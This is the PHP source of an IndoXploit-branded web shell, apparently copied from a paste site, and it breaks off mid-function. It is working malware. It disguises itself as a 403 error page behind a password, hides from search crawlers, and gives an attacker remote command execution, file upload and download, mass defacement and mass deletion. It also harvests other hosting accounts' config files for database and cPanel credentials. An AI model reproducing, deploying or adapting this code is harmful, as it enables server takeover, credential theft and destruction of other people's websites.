22

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12.  
13. $auth_pass = "1d516536b6b849aa18dc72bc6a868ff8";
14. $color = "#00ff00";
15. $default_action = 'FilesMan';
16. $default_use_ajax = true;
17. $default_charset = 'UTF-8';
18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
19.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
20.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21.         header('HTTP/1.0 404 Not Found');
22.         exit;
23.     }
24. }
25.  
26. function login_shell() {
27. ?>
28. <title>403 Forbidden</title>
29. </head><body>
30. <h1>Forbidden</h1>
31. <p>You don't have permission to access document
32. on this server.<br />
33. </p>
34. <p>Additionally, a 404 Not Found
35. error was encountered while trying to use an ErrorDocument to handle the request.</p>
36.     <style>
37.         input { margin:0;background-color:#fff;border:1px solid #fff; }
38.     </style>
39.     <center>
40.     <form method="post">
41.     <input type="password" name="pass">
42.     </form></center>
43. <?php
44. exit;
45. }
46. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
47.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
48.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
49.     else
50.         login_shell();
51. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
52.     @ob_clean();
53.     $file = $_GET['file'];
54.     header('Content-Description: File Transfer');
55.     header('Content-Type: application/octet-stream');
56.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
57.     header('Expires: 0');
58.     header('Cache-Control: must-revalidate');
59.     header('Pragma: public');
60.     header('Content-Length: ' . filesize($file));
61.     readfile($file);
62.     exit;
63. }
64. ?>
65. <html>
66. <head>
67. <title>OS - Team</title>
68. <link rel="shortcut icon" href="http://img06.deviantart.net/fd51/i/2016/353/0/a/15554682_1888186958078148_1747269681_n_by_owlsquad-das4abn.png">
69. <meta name='author' content='IndoXploit'>
70. <meta charset="UTF-8">
71. <style type='text/css'>
72. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
73. @import url(http://fonts.googleapis.com/css?family=Shadows+Into+Light);
74. @import url(http://fonts.googleapis.com/css?family=Indie+Flower);
75. @import url(http://fonts.googleapis.com/css?family=Monoton);
76.  
77. html {
78.     background: #000000;
79.     color: #ffffff;
80.     font-family: 'Ubuntu';
81.     font-size: 13px;
82.     width: 100%;
83. }
84. li {
85.     display: inline;
86.     margin: 5px;
87.     padding: 5px;
88. }
89. table, th, td {
90.     border-collapse:collapse;
91.     font-family: Tahoma, Geneva, sans-serif;
92.     background: transparent;
93.     font-family: 'Ubuntu';
94.     font-size: 13px;
95. }
96. .table_home, .th_home, .td_home {
97.     border: 1px solid #ffffff;
98. }
99. th {
100.     padding: 10px;
101. }
102. a {
103.     color: #ffffff;
104.     text-decoration: none;
105. }
106. a:hover {
107.     color: gold;
108.     text-decoration: underline;
109. }
110. b {
111.     color: gold;
112. }
113. input[type=text], input[type=password],input[type=submit] {
114.     background: transparent;
115.     color: #ffffff;
116.     border: 1px solid #ffffff;
117.     margin: 5px auto;
118.     padding-left: 5px;
119.     font-family: 'Ubuntu';
120.     font-size: 13px;
121. }
122. textarea {
123.     border: 1px solid #ffffff;
124.     width: 100%;
125.     height: 400px;
126.     padding-left: 5px;
127.     margin: 10px auto;
128.     resize: none;
129.     background: transparent;
130.     color: #ffffff;
131.     font-family: 'Ubuntu';
132.     font-size: 13px;
133. }
134. select {
135.     width: 152px;
136.     background: #000000;
137.     color: lime;
138.     border: 1px solid #ffffff;
139.     margin: 5px auto;
140.     padding-left: 5px;
141.     font-family: 'Ubuntu';
142.     font-size: 13px;
143. }
144. option:hover {
145.     background: lime;
146.     color: #000000;
147. }
148. </style>
149. <body onLoad="document.getElementById('cmd').focus();" bgcolor="#000" marginwidth="0" marginheight="0" style="background: black url(http://2.bp.blogspot.com/-luGtjlsoSv0/Uuwp_SxiURI/AAAAAAAADUA/EJQe99MBRJo/s1600/snapshot_063.jpg)
150.  
151. no-repeat center center fixed; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover;
152.  
153. background-size:cover;" onload="type_text()" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0">
154. </head>
155. <?php
156. ###############################################################################
157. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
158. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
159. // Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
160. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
161. // Greetz: All Member IndoXploit. & all my friends.
162. ###############################################################################
163. function w($dir,$perm) {
164.     if(!is_writable($dir)) {
165.         return "<font color=red>".$perm."</font>";
166.     } else {
167.         return "<font color=lime>".$perm."</font>";
168.     }
169. }
170. function r($dir,$perm) {
171.     if(!is_readable($dir)) {
172.         return "<font color=red>".$perm."</font>";
173.     } else {
174.         return "<font color=lime>".$perm."</font>";
175.     }
176. }
177. function exe($cmd) {
178.     if(function_exists('system')) {        
179.         @ob_start();       
180.         @system($cmd);     
181.         $buff = @ob_get_contents();        
182.         @ob_end_clean();       
183.         return $buff;  
184.     } elseif(function_exists('exec')) {        
185.         @exec($cmd,$results);      
186.         $buff = "";        
187.         foreach($results as $result) {         
188.             $buff .= $result;      
189.         } return $buff;    
190.     } elseif(function_exists('passthru')) {        
191.         @ob_start();       
192.         @passthru($cmd);       
193.         $buff = @ob_get_contents();        
194.         @ob_end_clean();       
195.         return $buff;  
196.     } elseif(function_exists('shell_exec')) {      
197.         $buff = @shell_exec($cmd);     
198.         return $buff;  
199.     }
200. }
201. function perms($file){
202.     $perms = fileperms($file);
203.     if (($perms & 0xC000) == 0xC000) {
204.     // Socket
205.     $info = 's';
206.     } elseif (($perms & 0xA000) == 0xA000) {
207.     // Symbolic Link
208.     $info = 'l';
209.     } elseif (($perms & 0x8000) == 0x8000) {
210.     // Regular
211.     $info = '-';
212.     } elseif (($perms & 0x6000) == 0x6000) {
213.     // Block special
214.     $info = 'b';
215.     } elseif (($perms & 0x4000) == 0x4000) {
216.     // Directory
217.     $info = 'd';
218.     } elseif (($perms & 0x2000) == 0x2000) {
219.     // Character special
220.     $info = 'c';
221.     } elseif (($perms & 0x1000) == 0x1000) {
222.     // FIFO pipe
223.     $info = 'p';
224.     } else {
225.     // Unknown
226.     $info = 'u';
227.     }
228.         // Owner
229.     $info .= (($perms & 0x0100) ? 'r' : '-');
230.     $info .= (($perms & 0x0080) ? 'w' : '-');
231.     $info .= (($perms & 0x0040) ?
232.     (($perms & 0x0800) ? 's' : 'x' ) :
233.     (($perms & 0x0800) ? 'S' : '-'));
234.     // Group
235.     $info .= (($perms & 0x0020) ? 'r' : '-');
236.     $info .= (($perms & 0x0010) ? 'w' : '-');
237.     $info .= (($perms & 0x0008) ?
238.     (($perms & 0x0400) ? 's' : 'x' ) :
239.     (($perms & 0x0400) ? 'S' : '-'));
240.     // World
241.     $info .= (($perms & 0x0004) ? 'r' : '-');
242.     $info .= (($perms & 0x0002) ? 'w' : '-');
243.     $info .= (($perms & 0x0001) ?
244.     (($perms & 0x0200) ? 't' : 'x' ) :
245.     (($perms & 0x0200) ? 'T' : '-'));
246.     return $info;
247. }
248. function hdd($s) {
249.     if($s >= 1073741824)
250.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
251.     elseif($s >= 1048576)
252.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
253.     elseif($s >= 1024)
254.     return sprintf('%1.2f',$s / 1024 ) .' KB';
255.     else
256.     return $s .' B';
257. }
258. function ambilKata($param, $kata1, $kata2){
259.     if(strpos($param, $kata1) === FALSE) return FALSE;
260.     if(strpos($param, $kata2) === FALSE) return FALSE;
261.     $start = strpos($param, $kata1) + strlen($kata1);
262.     $end = strpos($param, $kata2, $start);
263.     $return = substr($param, $start, $end - $start);
264.     return $return;
265. }
266. function getsource($url) {
267.     $curl = curl_init($url);
268.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
269.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
270.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
271.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
272.     $content = curl_exec($curl);
273.             curl_close($curl);
274.     return $content;
275. }
276. function bing($dork) {
277.     $npage = 1;
278.     $npages = 30000;
279.     $allLinks = array();
280.     $lll = array();
281.     while($npage <= $npages) {
282.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
283.         if($x) {
284.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
285.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
286.             $npage = $npage + 10;
287.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
288.         } else break;
289.     }
290.     $URLs = array();
291.     foreach($allLinks as $url){
292.         $exp = explode("/", $url);
293.         $URLs[] = $exp[2];
294.     }
295.     $array = array_filter($URLs);
296.     $array = array_unique($array);
297.     $sss = count(array_unique($array));
298.     foreach($array as $domain) {
299.         echo $domain."\n";
300.     }
301. }
302. function reverse($url) {
303.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
304.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
305.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
306.           curl_setopt($ch, CURLOPT_HEADER, 0);
307.           curl_setopt($ch, CURLOPT_POST, 1);
308.     $resp = curl_exec($ch);
309.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
310.     $array = explode(",,", $resp);
311.     unset($array[0]);
312.     foreach($array as $lnk) {
313.         $lnk = "http://$lnk";
314.         $lnk = str_replace(",", "", $lnk);
315.         echo $lnk."\n";
316.         ob_flush();
317.         flush();
318.     }
319.         curl_close($ch);
320. }
321. if(get_magic_quotes_gpc()) {
322.     function idx_ss($array) {
323.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
324.     }
325.     $_POST = idx_ss($_POST);
326.     $_COOKIE = idx_ss($_COOKIE);
327. }
328.  
329. if(isset($_GET['dir'])) {
330.     $dir = $_GET['dir'];
331.     chdir($dir);
332. } else {
333.     $dir = getcwd();
334. }
335. $kernel = php_uname();
336. $ip = gethostbyname($_SERVER['HTTP_HOST']);
337. $dir = str_replace("\\","/",$dir);
338. $scdir = explode("/", $dir);
339. $freespace = hdd(disk_free_space("/"));
340. $total = hdd(disk_total_space("/"));
341. $used = $total - $freespace;
342. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
343. $ds = @ini_get("disable_functions");
344. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
345. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
346. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
347. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
348. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
349. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
350. if(!function_exists('posix_getegid')) {
351.     $user = @get_current_user();
352.     $uid = @getmyuid();
353.     $gid = @getmygid();
354.     $group = "?";
355. } else {
356.     $uid = @posix_getpwuid(posix_geteuid());
357.     $gid = @posix_getgrgid(posix_getegid());
358.     $user = $uid['name'];
359.     $uid = $uid['uid'];
360.     $group = $gid['name'];
361.     $gid = $gid['gid'];
362. }
363. echo "<center>";
364.  
365.  
366. echo "<img src='http://img06.deviantart.net/fd51/i/2016/353/0/a/15554682_1888186958078148_1747269681_n_by_owlsquad-das4abn.png'width='200'> ";
367. echo "<br>";
368. echo "<marquee style='font-face: Indie Flower; color:white; width: 229px; width: 229px;' width='229'>
369. <font face='indie flower' style='opacity:0.8;filter:alpha(opacity=20)' size='5' color='white'>&#9679; Berandal &#9679; Yonkou4 &#9679; AKUSIHCUEK404 &#9679; Artefvcker &#9679; Z3U54774CK &#9679; Arrownonymous &#9679; Blck0Wl?  &#9679; KxK_PrajurID &#9679; Rizky21ID &#9679; R13z &#9679; RZL404 &#9679; ShoursCout &#9679; 0wLCulun &#9679; ./ARMVXO &#9679; ./claW &#9679; M4574H &#9679; SAMAEL &#9679; #AnonyX </marquee></font>";
370. echo "<br>";
371. echo "<hr>";
372. echo "System: <font color=lime>".$kernel."</font><br>";
373. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
374. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
375. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
376. echo "Safe Mode: $sm<br>";
377. echo "Disable Functions: $show_ds<br>";
378. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
379. echo "Current DIR: ";
380. foreach($scdir as $c_dir => $cdir) {   
381.     echo "<a href='?dir=";
382.     for($i = 0; $i <= $c_dir; $i++) {
383.         echo $scdir[$i];
384.         if($i != $c_dir) {
385.         echo "/";
386.         }
387.     }
388.     echo "'>$cdir</a>/";
389. }
390. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
391. echo "<hr>";
392. echo "<center>";
393. echo "<ul>";
394. echo "<li>[ <a href='?'>Home</a> ]</li>";
395. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
396. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
397. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
398. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
399. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
400. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
401. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
402. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
403. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
404. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
405. echo "<li>[ <a href='?dir=$dir&do=network'>network</a> ]</li>";
406. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>";
407. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
408. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
409. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
410. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
411. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
412. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
413. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
414. echo "<li>[ <a style='color: red;' href='?logout=true'>Logout</a> ]</li>";
415. echo "</ul>";
416. echo "</center>";
417. echo "<hr>";
418. if($_GET['logout'] == true) {
419.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
420.     echo "<script>window.location='?';</script>";
421. } elseif($_GET['do'] == 'upload') {
422.     echo "<center>";
423.     if($_POST['upload']) {
424.         if($_POST['tipe_upload'] == 'biasa') {
425.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
426.                 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
427.             } else {
428.                 $act = "<font color=red>failed to upload file</font>";
429.             }
430.         } else {
431.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
432.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
433.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
434.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
435.                     $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
436.                 } else {
437.                     $act = "<font color=red>failed to upload file</font>";
438.                 }
439.             } else {
440.                 $act = "<font color=red>failed to upload file</font>";
441.             }
442.         }
443.     }
444.     echo "Upload File:
445.     <form method='post' enctype='multipart/form-data'>
446.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
447.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
448.     <input type='file' name='ix_file'>
449.     <input type='submit' value='upload' name='upload'>
450.     </form>";
451.     echo $act;
452.     echo "</center>";
453. } elseif($_GET['do'] == 'cmd') {
454.     echo "<form method='post'>
455.     <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
456.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
457.     </form>";
458.     if($_POST['do_cmd']) {
459.         echo "<pre>".exe($_POST['cmd'])."</pre>";
460.     }
461. } elseif($_GET['do'] == 'mass_deface') {
462.     function sabun_massal($dir,$namafile,$isi_script) {
463.         if(is_writable($dir)) {
464.             $dira = scandir($dir);
465.             foreach($dira as $dirb) {
466.                 $dirc = "$dir/$dirb";
467.                 $lokasi = $dirc.'/'.$namafile;
468.                 if($dirb === '.') {
469.                     file_put_contents($lokasi, $isi_script);
470.                 } elseif($dirb === '..') {
471.                     file_put_contents($lokasi, $isi_script);
472.                 } else {
473.                     if(is_dir($dirc)) {
474.                         if(is_writable($dirc)) {
475.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
476.                             file_put_contents($lokasi, $isi_script);
477.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
478.                         }
479.                     }
480.                 }
481.             }
482.         }
483.     }
484.     function sabun_biasa($dir,$namafile,$isi_script) {
485.         if(is_writable($dir)) {
486.             $dira = scandir($dir);
487.             foreach($dira as $dirb) {
488.                 $dirc = "$dir/$dirb";
489.                 $lokasi = $dirc.'/'.$namafile;
490.                 if($dirb === '.') {
491.                     file_put_contents($lokasi, $isi_script);
492.                 } elseif($dirb === '..') {
493.                     file_put_contents($lokasi, $isi_script);
494.                 } else {
495.                     if(is_dir($dirc)) {
496.                         if(is_writable($dirc)) {
497.                             echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
498.                             file_put_contents($lokasi, $isi_script);
499.                         }
500.                     }
501.                 }
502.             }
503.         }
504.     }
505.     if($_POST['start']) {
506.         if($_POST['tipe_sabun'] == 'mahal') {
507.             echo "<div style='margin: 5px auto; padding: 5px'>";
508.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
509.             echo "</div>";
510.         } elseif($_POST['tipe_sabun'] == 'murah') {
511.             echo "<div style='margin: 5px auto; padding: 5px'>";
512.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
513.             echo "</div>";
514.         }
515.     } else {
516.     echo "<center>";
517.     echo "<form method='post'>
518.     <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
519.     <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
520.     <font style='text-decoration: underline;'>Folder:</font><br>
521.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
522.     <font style='text-decoration: underline;'>Filename:</font><br>
523.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
524.     <font style='text-decoration: underline;'>Index File:</font><br>
525.     <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Owlsquad</textarea><br>
526.     <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
527.     </form></center>";
528.     }
529. } elseif($_GET['do'] == 'mass_delete') {
530.     function hapus_massal($dir,$namafile) {
531.         if(is_writable($dir)) {
532.             $dira = scandir($dir);
533.             foreach($dira as $dirb) {
534.                 $dirc = "$dir/$dirb";
535.                 $lokasi = $dirc.'/'.$namafile;
536.                 if($dirb === '.') {
537.                     if(file_exists("$dir/$namafile")) {
538.                         unlink("$dir/$namafile");
539.                     }
540.                 } elseif($dirb === '..') {
541.                     if(file_exists("".dirname($dir)."/$namafile")) {
542.                         unlink("".dirname($dir)."/$namafile");
543.                     }
544.                 } else {
545.                     if(is_dir($dirc)) {
546.                         if(is_writable($dirc)) {
547.                             if(file_exists($lokasi)) {
548.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
549.                                 unlink($lokasi);
550.                                 $idx = hapus_massal($dirc,$namafile);
551.                             }
552.                         }
553.                     }
554.                 }
555.             }
556.         }
557.     }
558.     if($_POST['start']) {
559.         echo "<div style='margin: 5px auto; padding: 5px'>";
560.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
561.         echo "</div>";
562.     } else {
563.     echo "<center>";
564.     echo "<form method='post'>
565.     <font style='text-decoration: underline;'>Folder:</font><br>
566.     <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
567.     <font style='text-decoration: underline;'>Filename:</font><br>
568.     <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
569.     <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
570.     </form></center>";
571.     }
572. } elseif($_GET['do'] == 'config') {
573.     $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
574.     $idx = mkdir("idx_config", 0777);
575.     $isi_htc = "Options all\nRequire None\nSatisfy Any";
576.     $htc = fopen("idx_config/.htaccess","w");
577.     fwrite($htc, $isi_htc);
578.     while($passwd = fgets($etc)) {
579.         if($passwd == "" || !$etc) {
580.             echo "<font color=red>Can't read /etc/passwd</font>";
581.         } else {
582.             preg_match_all('/(.*?):x:/', $passwd, $user_config);
583.             foreach($user_config[1] as $user_idx) {
584.                 $user_config_dir = "/home/$user_idx/public_html/";
585.                 if(is_readable($user_config_dir)) {
586.                     $grab_config = array(
587.                         "/home/$user_idx/.my.cnf" => "cpanel",
588.                         "/home/$user_idx/.accesshash" => "WHM-accesshash",
589.                         "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
590.                         "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
591.                         "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
592.                         "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
593.                         "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
594.                         "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
595.                         "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
596.                         "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
597.                         "/home/$user_idx/public_html/forum/config.php" => "phpBB",
598.                         "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
599.                         "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
600.                         "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
601.                         "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
602.                         "/home/$user_idx/public_html/configuration.php" => "Joomla",
603.                         "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
604.                         "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
605.                         "/home/$user_idx/public_html/wp-config.php" => "WordPress",
606.                         "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
607.                         "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
608.                         "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
609.                     foreach($grab_config as $config => $nama_config) {
610.                         $ambil_config = file_get_contents($config);
611.                         if($ambil_config == '') {
612.                         } else {
613.                             $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
614.                             fputs($file_config,$ambil_config);
615.                         }
616.                     }
617.                 }      
618.             }
619.         }  
620.     }
621.     echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
622. } elseif($_GET['do'] == 'jumping') {
623.     $i = 0;
624.     echo "<div class='margin: 5px auto;'>";
625.     if(preg_match("/hsphere/", $dir)) {
626.         $urls = explode("\r\n", $_POST['url']);
627.         if(isset($_POST['jump'])) {
628.             echo "<pre>";
629.             foreach($urls as $url) {
630.                 $url = str_replace(array("http://","www."), "", strtolower($url));
631.                 $etc = "/etc/passwd";
632.                 $f = fopen($etc,"r");
633.                 while($gets = fgets($f)) {
634.                     $pecah = explode(":", $gets);
635.                     $user = $pecah[0];
636.                     $dir_user = "/hsphere/local/home/$user";
637.                     if(is_dir($dir_user) === true) {
638.                         $url_user = $dir_user."/".$url;
639.                         if(is_readable($url_user)) {
640.                             $i++;
641.                             $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
642.                             if(is_writable($url_user)) {
643.                                 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
644.                             }
645.                             echo $jrw."<br>";
646.                         }
647.                     }
648.                 }
649.             }
650.         if($i == 0) {
651.         } else {
652.             echo "<br>Total ada ".$i." Kamar di ".$ip;
653.         }
654.         echo "</pre>";
655.         } else {
656.             echo '<center>
657.                   <form method="post">
658.                   List Domains: <br>
659.                   <textarea name="url" style="width: 500px; height: 250px;">';
660.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
661.             while($getss = fgets($fp)) {
662.                 echo $getss;
663.             }
664.             echo  '</textarea><br>
665.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
666.                   </form></center>';
667.         }
668.     } elseif(preg_match("/vhosts/", $dir)) {
669.         $urls = explode("\r\n", $_POST['url']);
670.         if(isset($_POST['jump'])) {
671.             echo "<pre>";
672.             foreach($urls as $url) {
673.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
674.                 if(is_dir($web_vh) === true) {
675.                     if(is_readable($web_vh)) {
676.                         $i++;
677.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
678.                         if(is_writable($web_vh)) {
679.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
680.                         }
681.                         echo $jrw."<br>";
682.                     }
683.                 }
684.             }
685.         if($i == 0) {
686.         } else {
687.             echo "<br>Total ada ".$i." Kamar di ".$ip;
688.         }
689.         echo "</pre>";
690.         } else {
691.             echo '<center>
692.                   <form method="post">
693.                   List Domains: <br>
694.                   <textarea name="url" style="width: 500px; height: 250px;">';
695.                   bing("ip:$ip");
696.             echo  '</textarea><br>
697.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
698.                   </form></center>';
699.         }
700.     } else {
701.         echo "<pre>";
702.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
703.         while($passwd = fgets($etc)) {
704.             if($passwd == '' || !$etc) {
705.                 echo "<font color=red>Can't read /etc/passwd</font>";
706.             } else {
707.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
708.                 foreach($user_jumping[1] as $user_idx_jump) {
709.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
710.                     if(is_readable($user_jumping_dir)) {
711.                         $i++;
712.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
713.                         if(is_writable($user_jumping_dir)) {
714.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
715.                         }
716.                         echo $jrw;
717.                         if(function_exists('posix_getpwuid')) {
718.                             $domain_jump = file_get_contents("/etc/named.conf");   
719.                             if($domain_jump == '') {
720.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
721.                             } else {
722.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
723.                                 foreach($domains_jump[1] as $dj) {
724.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
725.                                     $user_jumping_url = $user_jumping_url['name'];
726.                                     if($user_jumping_url == $user_idx_jump) {
727.                                         echo " => ( <u>$dj</u> )<br>";
728.                                         break;
729.                                     }
730.                                 }
731.                             }
732.                         } else {
733.                             echo "<br>";
734.                         }
735.                     }
736.                 }
737.             }
738.         }
739.         if($i == 0) {
740.         } else {
741.             echo "<br>Total ada ".$i." Kamar di ".$ip;
742.         }
743.         echo "</pre>";
744.     }
745.     echo "</div>";
746. } elseif($_GET['do'] == 'auto_edit_user') {
747.     if($_POST['hajar']) {
748.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
749.             echo "username atau password harus lebih dari 6 karakter";
750.         } else {
